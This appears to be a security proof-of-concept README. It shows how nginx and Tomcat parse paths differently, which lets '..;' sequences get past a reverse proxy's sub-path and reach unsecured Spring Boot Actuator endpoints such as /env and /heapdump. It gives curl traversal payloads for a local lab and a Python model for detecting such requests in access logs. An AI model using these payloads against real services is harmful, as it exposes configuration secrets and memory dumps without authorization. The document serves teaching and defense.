This is a PoC that combines Orange Tsai's research on "Breaking Parser Logic" with an insecure configuration of spring-boot-starter-actuator as documented in Baeldung's docs, section 3.7 "Further Customization".
I do not want to blame Baeldung. His documentation is incredibly helpful, and he also explains what management.security.enabled=false means. The problem is that people copy and paste these examples without reading the explanations.
Here is another example of this setting: "Learn SpringBoot absolute beginners".
If you run a Java Spring Boot service behind a reverse proxy that only exposes a sub-path to the internet, people may still be able to reach every path on the Spring Boot service. Actuator endpoints are just one example.
- `cd spring; mvn clean install`
- `cd target; java -jar orange-actuator-poc-0.0.1-SNAPSHOT.jar`
- test the Java service:

```
curl http://localhost:8080/api/hello
```

- install nginx and change the nginx server listen port to 8081
- add this to your nginx configuration to add a proxy rule:

```
location /orange {
    proxy_pass http://localhost:8080/api;
    proxy_redirect off;
    proxy_set_header Host $host;
}
```

- start nginx, then run:

```
curl localhost:8081/orange/..;/env
curl localhost:8081/orange/directory/..;/..;/env
```
Nginx does not treat `;` as special, so `..;` is an ordinary segment to it: the second request matches `location /orange` and is forwarded to the Spring Boot application as http://localhost:8080/api/directory/..;/..;/env.
Tomcat, however, strips `;...` from each segment as a path parameter before normalizing, so the request becomes http://localhost:8080/env.
/env can be substituted with any default actuator endpoint, e.g. /trace or /heapdump.
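The parser differential above, modelled in Python as an added example (not part of this PoC): the proxy side resolves dot segments literally, the servlet side first drops `;` path parameters, and a request is flagged when the path the upstream actually serves falls outside the proxied `/api` prefix. Location and prefix are taken from the nginx rule above; percent-decoding and other nginx rewrite features are assumed away.

```python
# Added example: models nginx vs. Tomcat path normalization for the
# `location /orange { proxy_pass http://localhost:8080/api; }` rule.

LOCATION = "/orange"   # nginx location prefix from the README
UPSTREAM = "/api"      # path part of the proxy_pass target


def _resolve_dots(segments):
    """Resolve '.' and '..' segments the way a path normalizer does."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def normalize_proxy(path):
    """nginx view: ';' is an ordinary character, so '..;' is NOT a parent ref."""
    return _resolve_dots(path.split("/"))


def normalize_servlet(path):
    """Tomcat view: a ';...' suffix on a segment is a path parameter and is
    dropped before dot segments are resolved, so '..;' becomes '..'."""
    return _resolve_dots(seg.split(";", 1)[0] for seg in path.split("/"))


def proxied_path(path):
    """What nginx forwards upstream, or None when the location does not match.
    (Assumes no percent-decoding; the README's rule has no rewrite.)"""
    p = normalize_proxy(path)
    if p == LOCATION or p.startswith(LOCATION + "/"):
        return UPSTREAM + p[len(LOCATION):]
    return None


def upstream_view(path):
    """Path the Spring/Tomcat service actually serves for a proxied request."""
    fwd = proxied_path(path)
    return None if fwd is None else normalize_servlet(fwd)


def escapes_prefix(path):
    """True when the request is proxied but lands outside the intended prefix."""
    served = upstream_view(path)
    if served is None:
        return False
    return not (served == UPSTREAM or served.startswith(UPSTREAM + "/"))
```

Running `escapes_prefix` over access-log paths gives a simple detection for requests that only make sense if the two parsers disagree.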